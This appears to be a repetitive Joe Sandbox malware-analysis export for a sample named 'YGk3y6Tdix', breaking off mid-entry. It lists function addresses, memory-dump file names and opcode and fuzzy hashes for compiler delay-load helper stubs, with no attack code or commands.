Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e25bf4571ae229e726fb0df225f1d24eec23f24834efe1e4042c2a65a3749f9e
Instruction ID: d709768229daddad6b9d917a20c89029289963a8105dec3a55f31d8a2a85e41b
Opcode Fuzzy Hash: e25bf4571ae229e726fb0df225f1d24eec23f24834efe1e4042c2a65a3749f9e
Instruction Fuzzy Hash: 72B012D635C101AC3005514F6D03EF7015EE1C8B10334C02FF805C41C0D840EC003D72

Function 00FBE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 10456a4b867156f17197ac9d1f620938b9c786121e574dea625bccebf28bc149
Instruction ID: 9eb57ec65e6d3177980764242ee022636806f9ca08ed5b0218fbf3b22de0d855
Opcode Fuzzy Hash: 10456a4b867156f17197ac9d1f620938b9c786121e574dea625bccebf28bc149
Instruction Fuzzy Hash: 44B012D6358101BC3005114B6D03DF7011ED1C5B10334C42FFC41C44C0D840EC003CB2

Function 00FBE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 817b2b6a6e68cf8ef225512638fcadd6e7272aedb63e39f7e54e959f68ebcb5a
Instruction ID: e24e8b667713ce4c286fa1ad2331f19f9ead861d4363defb68fd26a78a7432b8
Opcode Fuzzy Hash: 817b2b6a6e68cf8ef225512638fcadd6e7272aedb63e39f7e54e959f68ebcb5a
Instruction Fuzzy Hash: 54B012E2358001AC3005510B6E02EF701DED1C4B10734C02FF805C41C0DC41EC013C72

Function 00FBE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 34d560535f3b7a17ba3ad30fc469f8d863bdb937d7578308e6b5b318a65b0e51
Instruction ID: 15312dd0d6eeab4d48df05bdb1dedd70094f294d9c5d093d0c735cc67e3a8eaa
Opcode Fuzzy Hash: 34d560535f3b7a17ba3ad30fc469f8d863bdb937d7578308e6b5b318a65b0e51
Instruction Fuzzy Hash: 62B012D2358001AC3005511B6D02EFB019ED1C5B10334C02FFC05C41C0D840EC003CB2

Function 00FBE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1df71d0e3cd3afbf7adb019086f6b966b7b59d8863c940ca84efbd423526e05c
Instruction ID: 558e27b01f7e2e9f0457c25e2e5b94ef6843855320ec78da9f0725cf2d2b5c90
Opcode Fuzzy Hash: 1df71d0e3cd3afbf7adb019086f6b966b7b59d8863c940ca84efbd423526e05c
Instruction Fuzzy Hash: EEB012D2369041AC3005510B6D02EF7019FE5C8B10734C02FF806C41C0D840EC003C72

Function 00FBE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fd8917e3a5f1fc95dd795e9c9f88a020c4ef63cebcc3438e12106c2f9f126048
Instruction ID: a16a5041726aaf7706d3f3d8a584bef21820b5cebe9d95196999433a2ed2e3d8
Opcode Fuzzy Hash: fd8917e3a5f1fc95dd795e9c9f88a020c4ef63cebcc3438e12106c2f9f126048
Instruction Fuzzy Hash: F7B012E2359141BC3045520B6D02EF7015FD1C4B10734C12FF805C41C0D840EC443C72

Function 00FBE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 76d5a690593636a6db82606d3069801075af43a1735bd608240184b1d0c789f3
Instruction ID: 168ff0da7b66f44dfbaf882a375b587f5f232c286f8254a62257d5482022cf8f
Opcode Fuzzy Hash: 76d5a690593636a6db82606d3069801075af43a1735bd608240184b1d0c789f3
Instruction Fuzzy Hash: 3EB012D2359041AC3005510B6D02EF7015FD1C5B10734C02FFC05C41C0D840EC003CB2

Function 00FBE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 63f8b12ba0287c60bb816cdecf6875c70ffc2b51102a1a1787bd79298583d39c
Instruction ID: b68306b7c2f058e1a1a527b1b28806f79e4cb31b7229a5d0841584684714eefd
Opcode Fuzzy Hash: 63f8b12ba0287c60bb816cdecf6875c70ffc2b51102a1a1787bd79298583d39c
Instruction Fuzzy Hash: 9DB012E2358001AC3005510B6D02EF7015EE1C8F10334C02FF805C41C0D840EC003C72

Function 00FBE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e54cccf2298a9930eee4b01864338fed00c15f7af5b95be0c54b5b5dc01df831
Instruction ID: 4c858246a2df036dffff6fbbdd7752913b637d63c68c5638d66ddbb4b55171c7
Opcode Fuzzy Hash: e54cccf2298a9930eee4b01864338fed00c15f7af5b95be0c54b5b5dc01df831
Instruction Fuzzy Hash: 54B012E2358001AC3005510B6E02FF7015ED1C4F10334C02FF805C41C0DC41ED013C72

Function 00FBE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1cc756924998aee0d91f3ba841f9d1b1d07bfbb951981f8f76776336d61038c1
Instruction ID: 15a109d831ea8d8fc230e43a8228ea2f719d7e2a509108e6c1f41a292bcae09d
Opcode Fuzzy Hash: 1cc756924998aee0d91f3ba841f9d1b1d07bfbb951981f8f76776336d61038c1
Instruction Fuzzy Hash: 61B012E2358101BC3045510B6D02EF7015ED1C4F10334C12FF805C41C0D841EC403C72

Function 00FBE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4447a4643b111184797a0cae444f511a63f994c58363a52c60152764b7a9ea74
Instruction ID: 7adfccb5672fc635a8aa54ffc3cba7a53ba330542ea155a2b0cb7ffe790aa139
Opcode Fuzzy Hash: 4447a4643b111184797a0cae444f511a63f994c58363a52c60152764b7a9ea74
Instruction Fuzzy Hash: D0B012E2359001BC3005510B6D02EF7015ED1C5F10334C02FFC05C41C0D840EC003CB2

Function 00FBE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e289a0a0df51f71db15bf012f1dc813775971be11b4cc4aceda98aabed946de5
Instruction ID: bd647303ce758307e05875f8bcc9a843da46a49bc342e90a6aeda0eb0a7e91eb
Opcode Fuzzy Hash: e289a0a0df51f71db15bf012f1dc813775971be11b4cc4aceda98aabed946de5
Instruction Fuzzy Hash: 87B012D2358401EC3005520B6E02EF7015ED1C4B10334C02FF805C42C0DC51EC493C72

Function 00FBE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7ee412eba10d878820ab9e3917ba6451af74365e6782489ba0d724e4131b67b9
Instruction ID: 88a353cafeddceaa7962abd9ff68a16e09f82d4bb6b4605551ab706975a2bdae
Opcode Fuzzy Hash: 7ee412eba10d878820ab9e3917ba6451af74365e6782489ba0d724e4131b67b9
Instruction Fuzzy Hash: F2B012D2358541FC3045520B6D02EF7015ED1C4B10334C12FF805C42C0D840EC443C72

Function 00FBE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3da63a467c8ec769823efd434e310e50925377592473667a5f8d36a5323db929
Instruction ID: 70d68e98962341d51e2dc4ae98a31f4b77240ff6402006d64ddc878f6be83fea
Opcode Fuzzy Hash: 3da63a467c8ec769823efd434e310e50925377592473667a5f8d36a5323db929
Instruction Fuzzy Hash: E8B012E2259501BC3045D2065C02DF7028ED0C0B10334C01FF808C51C0D840CC043CB3

Function 00FBE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0184ce535400e695c682bbc55a13bc86065fd70e4ade5f451fd2d78e346c992c
Instruction ID: d1e439ca5079ea15ac26034a25657ef5b9be9efcd7c21d63abc1de5eab001aeb
Opcode Fuzzy Hash: 0184ce535400e695c682bbc55a13bc86065fd70e4ade5f451fd2d78e346c992c
Instruction Fuzzy Hash: 04B012F225A001BC3045D2065C02DF7028ED0C0F10334801FF808C51C0D844CD003CB3

Function 00FBE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ec8eae6cbfe09791d7afdb1dbfefc8775a088a6fd1f9195cc6814134f36a246f
Instruction ID: aa391e508001ad5923c3376a4f3d90856d4316cbb856b06782be33af1b5fc32b
Opcode Fuzzy Hash: ec8eae6cbfe09791d7afdb1dbfefc8775a088a6fd1f9195cc6814134f36a246f
Instruction Fuzzy Hash: 52B012E22594017C304592075D02DF7028ED0C0B10334C01FF508C51C0D840CC493CB3

Function 00FBE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE580

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
